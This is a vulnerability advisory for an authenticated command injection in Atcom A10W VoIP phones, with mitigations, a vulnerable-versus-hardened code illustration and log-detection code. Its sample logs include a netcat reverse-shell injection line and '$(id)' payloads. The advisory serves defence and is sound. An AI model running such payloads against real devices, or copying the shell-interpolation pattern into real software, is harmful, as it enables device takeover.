CVE-2019-12328

9.0 CRITICAL

📋 TL;DR

CVE-2019-12328 lets an authenticated attacker with access to the web interface of an Atcom A10W VoIP phone (the CVE description scopes this to attackers on the same network) execute arbitrary OS commands by placing shell metacharacters in a POST request to the remote phonebook configuration URI. The root cause is missing input validation in the web interface: the submitted value reaches a shell unchanged. Only Atcom A10W phones on the affected firmware are known to be affected.

💻 Affected Systems

Products:
  • Atcom A10W VoIP Phone
Versions: Firmware 2.6.1a2421 (the only version reported; earlier releases are untested and should be assumed affected until Atcom states otherwise)
Operating Systems: Embedded Linux-based firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Exploitation requires valid credentials for the phone's web interface. No configuration setting removes the flaw, so every deployment running this firmware is vulnerable, default settings included.

📦 What is this software?

The Atcom A10W is a SIP-based VoIP desk phone made by Atcom. Like most IP phones it is administered through an embedded web interface on the device, which includes a page for configuring a remote phonebook (a contact list the phone downloads from a configured URL). The handler behind that page is where the flaw lives.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full device compromise: the attacker can install persistent backdoors, intercept calls, pivot to other devices on the VoIP network, or enlist the phone in a botnet.

🟠

Likely Case

The attacker gains a shell on the phone and can modify its configuration, intercept VoIP traffic, or disrupt phone service.

🟢

If Mitigated

Limited impact if VoIP devices are segmented from the rest of the network, the web interface is reachable only from management hosts, and strong, non-default credentials are enforced.

🌐 Internet-Facing: LOW - The CVE description scopes the attacker to the same network, and exploitation needs valid web-interface credentials. This rating only holds while the phone's web interface is not reachable from the internet; a phone whose management port is exposed or port-forwarded is exploitable by anyone who holds or guesses those credentials.
🏢 Internal Only: HIGH - Any user on the internal network who can reach the web interface and has, or obtains, credentials gets OS command execution on the phone.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authentication but is otherwise trivial: a single crafted POST to the phonebook configuration URI with shell metacharacters in the submitted value is enough.
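The mechanism, as an added illustration that is not Atcom's firmware code (the page has no view of the phone's source): a web handler that interpolates the submitted remote-phonebook URL into a shell command hands every shell metacharacter in it to /bin/sh, whereas passing the URL as a single argv element, after allowlist validation, leaves it inert. echo stands in for the phone's fetch tool so this runs harmlessly offline; the URL values and the allowlist policy are assumptions made for the example.

```python
import re
import subprocess
from urllib.parse import urlsplit

# Constructed illustration of the bug class behind CVE-2019-12328; this is
# not Atcom's code. "echo" replaces the real fetch tool so that an injected
# command shows up in stdout instead of doing anything.


def fetch_vulnerable(url: str) -> str:
    """Build the fetch command as a string and hand it to /bin/sh.

    Anything the shell treats specially in `url` (';', '|', '&', '$(..)',
    backticks) is interpreted: this is the missing-validation bug.
    """
    cmd = f"echo fetching {url}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def fetch_hardened(url: str) -> str:
    """Pass the URL as one argv element with no shell involved.

    The string reaches the child program verbatim; metacharacters are just
    bytes inside an argument.
    """
    return subprocess.run(["echo", "fetching", url], capture_output=True, text=True).stdout


# Strict allowlist for what a remote phonebook URL may look like (an assumed
# policy for this example, not the vendor's).
HOST_RE = re.compile(r"[A-Za-z0-9.-]+")
PATH_RE = re.compile(r"[A-Za-z0-9._~/%-]*")


def is_acceptable_phonebook_url(url: str) -> bool:
    """Reject anything that is not a plain http(s) URL to a file path.

    Validation is defence in depth: the real fix is never building a shell
    command from the value, but rejecting junk early keeps it out of the
    stored configuration as well.
    """
    try:
        parts = urlsplit(url)
        _ = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if parts.username or parts.password or parts.query or parts.fragment:
        return False
    return bool(HOST_RE.fullmatch(parts.hostname)) and bool(PATH_RE.fullmatch(parts.path))


def fetch_phonebook(url: str) -> str:
    """The handler as it should be written: validate, then call without a shell."""
    if not is_acceptable_phonebook_url(url):
        raise ValueError(f"rejected remote phonebook URL: {url!r}")
    return fetch_hardened(url)


if __name__ == "__main__":
    payload = "http://pbx.example.com/;echo INJECTED"  # constructed test input
    print("vulnerable:", repr(fetch_vulnerable(payload)))
    print("hardened:  ", repr(fetch_hardened(payload)))
    print("accepted:  ", is_acceptable_phonebook_url(payload))
```

Run it and the vulnerable path prints a second line, INJECTED, that the caller never asked for, while the hardened path prints the payload back as a literal string. Validation alone would not have been enough: a URL can be syntactically valid and still carry `$(...)`, `;` or backticks in its path or query, so the hardened handler both rejects them and never goes through a shell.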

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown (no fixed firmware has been identified)

Vendor Advisory: No official vendor advisory found

Restart Required: Not applicable until a fixed firmware exists (applying a firmware update reboots the phone)

Instructions:

No fix is known at the time of writing. Ask Atcom whether a firmware release newer than 2.6.1a2421 addresses this issue, and confirm it as described under How to Verify before relying on it. Until then, apply the workarounds below.

🔧 Temporary Workarounds

Network Segmentation

all

Isolate VoIP phones on separate VLAN to limit attack surface

Web Interface Access Control

linux

Restrict access to the phone web interface to specific management IPs only. The rules below belong on the firewall or router in front of the VoIP VLAN, not on the phone itself; 192.168.10.0/24 stands for the phone subnet and 192.168.1.100 for the management host (both are placeholders). Add port 443 if HTTPS management is enabled on the phones. SIP and RTP are unaffected because only the web port is filtered.

# On the gateway in front of the VoIP VLAN (FORWARD chain, since the traffic transits the box)
iptables -A FORWARD -s 192.168.1.100 -d 192.168.10.0/24 -p tcp --dport 80 -j ACCEPT
iptables -A FORWARD -d 192.168.10.0/24 -p tcp --dport 80 -j DROP

🧯 If You Can't Patch

  • Segment the VoIP network from the general corporate network
  • Implement strict firewall rules so that only management hosts can reach the phone web interface
  • Replace default or shared web-interface credentials with strong, unique ones; exploitation needs a valid login, so credential hygiene directly raises the bar

🔍 How to Verify

Check if Vulnerable:

Check the firmware version via the phone web interface > System Status. If the version is 2.6.1a2421, or any release for which Atcom has not confirmed a fix, assume the phone is vulnerable.

Check Version:

# status.cgi is an assumed path: copy the real one from the System Status page in your browser's network tab
curl -s -u admin:password http://phone-ip/status.cgi | grep -i firmware

Verify Fix Applied:

On a phone you are authorised to test, send a controlled POST to the phonebook configuration endpoint with a harmless but observable command in the metacharacter payload, such as a delay (sleep) or a connection to a listener you control. If the delay or callback no longer occurs after the update, the fix is applied; if it does, the firmware is still vulnerable regardless of what the version string says.

📡 Detection & Monitoring

Log Indicators:

  • Unusual POST requests to /phonebook configuration endpoints
  • Shell command execution in system logs
  • Multiple failed authentication attempts followed by successful login

Network Indicators:

  • POST requests to phone IPs containing shell metacharacters like ;, |, &, $()
  • Unexpected outbound connections from VoIP phones

SIEM Query:

source="voip-phones" AND method="POST" AND uri="*phonebook*" AND (content="*;*" OR content="*|*" OR content="*$(*" OR content="*`*" OR content="*%3B*" OR content="*%7C*" OR content="*%24%28*" OR content="*%60*")

The field names are placeholders for whatever your log source exposes. Match on the decoded request body where the platform supports it; the percent-encoded variants are included above because a raw match on ";" or "$(" misses a payload sent as %3B or %24%28. A match on "&" is only useful after the body has been split into fields, since "&" also separates normal form parameters.
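The same detection logic worked through over log lines, as an added example that is not part of the page or of any Atcom tooling: it scans constructed access-log lines for POSTs to a phonebook URI whose form fields contain shell metacharacters after URL-decoding. The log format, the /cgi-bin/phonebook.cgi path and all addresses are assumptions; real A10W phones may not log POST bodies at all, in which case the same function applies to a reverse-proxy log or to bodies extracted from packet capture.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (not real Atcom logs). The format, the path
# /cgi-bin/phonebook.cgi and all addresses are assumptions for this example.
SAMPLE_LOGS = [
    '192.168.1.100 - admin [12/Jun/2019:10:01:02 +0000] "POST /cgi-bin/phonebook.cgi HTTP/1.1" 200 body="url=http://pbx.example.com/phonebook.xml"',
    '192.168.1.55 - admin [12/Jun/2019:10:02:17 +0000] "POST /cgi-bin/phonebook.cgi HTTP/1.1" 200 body="url=http://x/;nc+192.168.1.55+4444+-e+/bin/sh"',
    '192.168.1.55 - admin [12/Jun/2019:10:02:40 +0000] "POST /cgi-bin/phonebook.cgi HTTP/1.1" 200 body="url=%24%28id%29"',
    '192.168.1.100 - admin [12/Jun/2019:10:03:00 +0000] "GET /cgi-bin/phonebook.cgi HTTP/1.1" 200 body=""',
    '192.168.1.100 - admin [12/Jun/2019:10:04:00 +0000] "POST /cgi-bin/sip.cgi HTTP/1.1" 200 body="user=1001&pass=x|y"',
    '192.168.1.55 - admin [12/Jun/2019:10:05:12 +0000] "POST /cgi-bin/phonebook.cgi HTTP/1.1" 200 body="url=http://x/%26%26id&name=Corp"',
]

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) body="(?P<body>[^"]*)"$'
)

# Characters and sequences /bin/sh treats as command separators or substitution.
# Newline is included because %0a decodes to one.
META_RE = re.compile(r"[;|&`\n]|\$\(|\$\{")


def form_fields(body: str):
    """Split a form-encoded body into (name, decoded value) pairs by hand.

    Splitting on '&' before decoding means a literal '&' inside a value
    (sent as %26) survives as data, and ';' is never treated as a field
    separator (older urllib.parse.parse_qsl versions split on it and would
    hide the payload in the second sample line).
    """
    fields = []
    for pair in body.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            fields.append((unquote_plus(name), unquote_plus(value)))
    return fields


def suspicious_fields(body: str):
    """Return the (name, value) pairs whose decoded value carries shell metacharacters."""
    return [(n, v) for n, v in form_fields(body) if META_RE.search(v)]


def detect(lines):
    """Alert on POSTs to a phonebook URI with metacharacters in any form value."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; count these separately in production
        rec = m.groupdict()
        if rec["method"] != "POST" or "phonebook" not in rec["uri"].lower():
            continue
        hits = suspicious_fields(rec["body"])
        if hits:
            alerts.append({"ts": rec["ts"], "src": rec["src"], "user": rec["user"],
                           "uri": rec["uri"], "fields": hits})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOGS):
        print(f'{a["ts"]} {a["src"]} user={a["user"]} {a["uri"]} fields={a["fields"]}')
```

Against the sample lines this flags the three requests from 192.168.1.55 (a `;` chained command, a percent-encoded `$(id)`, and an encoded `&&`) and stays quiet on the benign phonebook update, the GET, and the `|` in a request to a different CGI. Decoding per field rather than grepping the raw body is what makes the second and third cases visible.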
